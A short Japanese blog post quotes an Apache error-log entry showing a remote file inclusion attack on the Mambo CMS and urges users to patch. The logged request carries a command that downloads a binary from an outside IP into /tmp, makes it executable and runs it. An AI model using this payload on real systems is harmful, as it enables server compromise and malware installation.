apacheのエラーログを眺めていたら見慣れないものが

[Sat Dec 24 11:14:18 2005] [error] [client 83.16.85.11] request failed: erroneous characters after pro
tocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosCo
nfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%2
0micu;./micu;echo%20YYY;echo| HTTP\\x01.1

どうやらMAMBOというPHPベースのCMSを狙った攻撃らしい。

当サイトではMAMBOは使用していないしそれまで存在すら知らなかった。調べたところ日本語化をしていたコミュニティーが存在し、最近本家のMAMBOが分裂したりして追従が困難になって活動を休止しているようだ。

この攻撃の対象となっているPHPベースのCMSに共通して存在していた脆弱性に対するパッチはすでに公開されているので古いMAMBOを使っている人は至急パッチを適用したほうがよいだろう。